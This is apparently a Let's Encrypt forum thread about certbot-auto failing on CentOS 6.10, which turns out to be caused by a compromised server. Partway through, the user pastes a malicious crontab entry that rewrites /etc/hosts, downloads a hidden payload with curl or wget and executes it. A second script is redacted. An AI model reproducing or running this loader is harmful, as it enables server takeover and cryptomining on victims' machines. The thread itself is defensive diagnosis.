To use Certbot, packages from the EPEL repository need to be installed

Please fill out the fields below so we can help you better. Note: you must provide your domain name to get help. Domain names for issued certificates are all made public in Certificate Transparency logs (e.g. https://crt.sh/?q=example.com), so withholding your domain name here does not increase secrecy, but only makes it harder for us to provide help.

My domain is: parklandpaving.co.za

I ran this command:certbot-auto

It produced this output:To use Certbot, packages from the EPEL repository need to be installed.

My web server is (include version):Centos 6.10

The operating system my web server runs on is (include version):Apache

My hosting provider, if applicable, is:Domains

I can login to a root shell on my machine (yes or no, or I don’t know):Yes

I’m using a control panel to manage my site (no, or provide the name and version of the control panel):No

The version of my client is (e.g. output of certbot --version or certbot-auto --version if you’re using Certbot): certbot-auto does not work !

It used to work - Then I did a Yum Update

Now it does not -

EPEL is enabled and installed !

Hi @garyvr888,

Welcome to the community forum! Can you please run through the certbot installation steps again from https://certbot.eff.org/lets-encrypt/centos6-other and let me know what output you receive.

1 Like

I did this a couple of times - Did it again - overwrite (y)

/usr/local/bin/certbot-auto certonly
Bootstrapping dependencies for RedHat-based OSes… (you can skip this with --no-bootstrap)
yum is /usr/bin/yum
/usr/local/bin/certbot-auto: line 372: 28466 Killed $TOOL list *virtualenv > /dev/null 2>&1
To use Certbot, packages from the EPEL repository need to be installed.
/usr/local/bin/certbot-auto: line 372: 28561 Killed $TOOL list epel-release > /dev/null 2>&1
Enable the EPEL repository and try running Certbot again.

1 Like

rpm -ivh https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
Retrieving https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
Freeing read locks for locker 0xff08d: 30558/140180632635136
Freeing read locks for locker 0xff08f: 30558/140180632635136
Preparing… ########################################### [100%]
package epel-release-6-8.noarch is already installed

@garyvr888

I was able to successfully install certbot-auto in a fresh Centos 6.10 container.

[root@0d587d5dda4c /]# certbot-auto --version
certbot 0.35.1

[root@0d587d5dda4c /]# which certbot-auto
/usr/local/bin/certbot-auto

[root@0d587d5dda4c /]# rpm -q epel-release
epel-release-6-8.noarch

[root@0d587d5dda4c /]# cat /etc/centos-release 
CentOS release 6.10 (Final)

[root@0d587d5dda4c /]# /usr/local/bin/certbot-auto certonly --register-unsafely-without-email
Saving debug log to /var/log/letsencrypt/letsencrypt.log

How would you like to authenticate with the ACME CA?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
1: Spin up a temporary webserver (standalone)
2: Place files in webroot directory (webroot)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1
Plugins selected: Authenticator standalone, Installer None
Registering without email!

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Please read the Terms of Service at
https://letsencrypt.org/documents/LE-SA-v1.2-November-15-2017.pdf. You must
agree in order to register with the ACME server at
https://acme-v02.api.letsencrypt.org/directory
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(A)gree/(C)ancel: A
Please enter in your domain name(s) (comma and/or space separated)  (Enter 'c'
to cancel): fake-website.faketld

Can you show me the output of these commands please?

rpm -qa | grep python
rpm -q epel-release
ls -al /opt/eff.org/certbot/

Have you tried completely completely removing certbot-auto and the /opt/eff.org/certbot/ folder and following the install guide again?

rpm -qa | grep python
Freeing read locks for locker 0xff161: 28561/140646869485312
Freeing read locks for locker 0xff163: 28561/140646869485312
newt-python-0.52.11-4.el6.x86_64
libxml2-python-2.7.6-21.el6_8.1.x86_64
python27-setuptools-39.0.1-1.ius.el6.noarch
python27-devel-2.7.15-1.ius.el6.x86_64
mod_python-3.3.1-16.el6.x86_64
audit-libs-python-2.4.5-6.el6.x86_64
setools-libs-python-3.3.7-4.el6.x86_64
python-tools-2.6.6-66.el6_8.x86_64
python-libs-2.6.6-66.el6_8.x86_64
python27-2.7.15-1.ius.el6.x86_64
libsemanage-python-2.0.43-5.1.el6.x86_64
policycoreutils-python-2.0.83-30.1.el6_8.x86_64
python-virtualenv-12.0.7-1.el6.noarch
rpm-python-4.8.0-59.el6.x86_64
python-pycurl-7.19.0-9.el6.x86_64
python27-libs-2.7.15-1.ius.el6.x86_64
python27-pip-9.0.1-1.ius.el6.noarch
libselinux-python-2.0.94-7.el6.x86_64
python-devel-2.6.6-66.el6_8.x86_64
python-urlgrabber-3.9.1-11.el6.noarch
python27-virtualenv-15.1.0-1.ius.el6.noarch
python-iniparse-0.3.1-2.1.el6.noarch
python-setuptools-0.6.10-4.el6_9.noarch
python-pip-7.1.0-1.el6.noarch
python-2.6.6-66.el6_8.x86_64

rpm -q epel-release
epel-release-6-8.noarch

ls -al /opt/eff.org/certbot/
ls: cannot access /opt/eff.org/certbot/: No such file or directory

python --version
Python 2.6.6

1 Like

As I said certbot-auto used and worked fine for a long time –

https://www.powersportsrider.co.za/index.php ( A working site on the server ) - I did a yum update and wanted to install a new websites certificate and … this Error.

uptime
20:51:09 up 257 days, 13:09, 2 users, load average: 3.81, 3.58, 3.39

@garyvr888
Out of curiosity, what are the CPU and RAM specs of your machine?

cat /proc/cpuinfo
free -mt

Cloud VM - 4 cores 4 GB - I see CPU usage has gone big suddenly ?

top - 20:56:53 up 257 days, 13:15, 2 users, load average: 3.08, 3.40, 3.38
Tasks: 180 total, 1 running, 179 sleeping, 0 stopped, 0 zombie
Cpu(s): 74.2%us, 0.2%sy, 0.0%ni, 24.5%id, 0.0%wa, 0.0%hi, 0.0%si, 1.1%st
Mem: 4051492k total, 3931780k used, 119712k free, 245924k buffers
Swap: 0k total, 0k used, 0k free, 1989996k cached

1 Like

I saw that too based on the load reported from uptime. I’m wondering if perhaps the certbot-auto install script OOM’d (out of memory) while trying to setup. If you can fix the load issue and then re-run the certbot installation steps, let me know the entirety of the output you receive.

1 Like

free -m
total used free shared buffers cached
Mem: 3956 3740 215 179 240 1801
-/+ buffers/cache: 1699 2257
Swap: 0 0 0

1 Like

I rebooted the server and success - Working again - Cpu usage 0.2 % :slight_smile:

New certificate applied - https://www.parklandpaving.co.za/

Thank you for your help - yum update ? Probably wanted a reboot on some issue I did not see until running certbot ?

2 Likes

Awesome, glad to hear it!

The real reason this horrible thing

crontab -l
/11 * * * * root tbin=(command -v passwd); bpath=(dirname
"{tbin}"); curl="curl"; if [ (curl --version 2>/dev/null|grep
"curl "|wc -l) -eq 0 ]; then curl=“echo”; if [ "{bpath}" != "" ]; then for f in {bpath}
; do strings $f 2>/dev/null|grep -q
“CURLOPT_VERBOSE” && curl="f" && break; done; fi; fi; wget="wget"; if [ (wget --version 2>/dev/null|grep "wgetrc
"|wc -l) -eq 0 ]; then wget=“echo”; if [ "{bpath}" != "" ]; then for f in {bpath}*; do strings $f 2>/dev/null|grep -q “to
" && wget=”f" && break; done; fi; fi; if [ (cat /etc/hosts|grep -i
“onion.|timesync.su|tor2web”|wc -l) -ne 0 ]; then echo
“127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1;
fi; ({curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 -o //.cache/.ntp||{curl} -fsSLk --retry 2 --connect-timeout 22
–max-time 75 -o
//.cache/.ntp||{curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 -o //.cache/.ntp||{wget} --quiet --tries=2 --wait=5
–no-check-certificate --connect-timeout=22 --timeout=75
-O
//.cache/.ntp||{wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 -O //.cache/.ntp||{wget} --quiet --tries=2 --wait=5
–no-check-certificate --connect-timeout=22 --timeout=75
-O //.cache/.ntp)
&& chmod +x //.cache/.ntp && /bin/sh //.cache/.ntp

1 Like

@garyvr888
Oh my gosh, that’s disgusting.

Here is the actual virus - Caused the server resources to tank -
hence certbot did not work et etc - It looks like the latest one

  • As one of the fixes was to chattr +1 to stop crontabs from
    activating - This one just changes it back and over writes it -

    LBIN8="kthrotlds"  --- This was the name of the process that hogs
    

everything - Might see it in my previous emails …

[malicious script redacted] by Phil_LE

@garyvr888

Very cool, but unfortunate find. I think it would be in your best interest to audit your website code, attempt to find the initial attack vector, and completely re-image that server.

I have re installed but now get certificate not secure ?

https://dealercontrol.co.za

I have reinstalled new instance - But now https://dealercontrol.co.za

not secure

Hi @garyvr888

you have created the wrong certificate ( https://check-your-website.server-daten.de/?q=dealercontrol.co.za ):

Your certificate

CN=dealercontrol.co.za
	17.06.2019
	15.09.2019
expires in 90 days	dealercontrol.co.za - 1 entry

has only one domain name. So your www version

Domainname Http-Status redirect Sec. G
http://dealercontrol.co.za/
154.66.196.79 301 https://dealercontrol.co.za/ 0.384 A
http://www.dealercontrol.co.za/
154.66.196.79 301 https://www.dealercontrol.co.za/ 0.380 A
https://dealercontrol.co.za/
154.66.196.79 200 2.160 B
https://www.dealercontrol.co.za/
154.66.196.79 404 1.743 N
Not Found
Certificate error: RemoteCertificateNameMismatch, RemoteCertificateChainErrors

isn’t secure.

And you have a private ipv6 address as AAAA entry:

Host T IP-Address is auth. ∑ Queries ∑ Timeout
dealercontrol.co.za A 154.66.196.79
/ZA yes 2 0
AAAA fe80::216:3eff:feb3:1504 yes
www.dealercontrol.co.za C dealercontrol.co.za yes 1 0
A 154.66.196.79
/ZA yes
AAAA fe80::216:3eff:feb3:1504 yes

That doesn’t produce problems, but it’s wrong.

2 Likes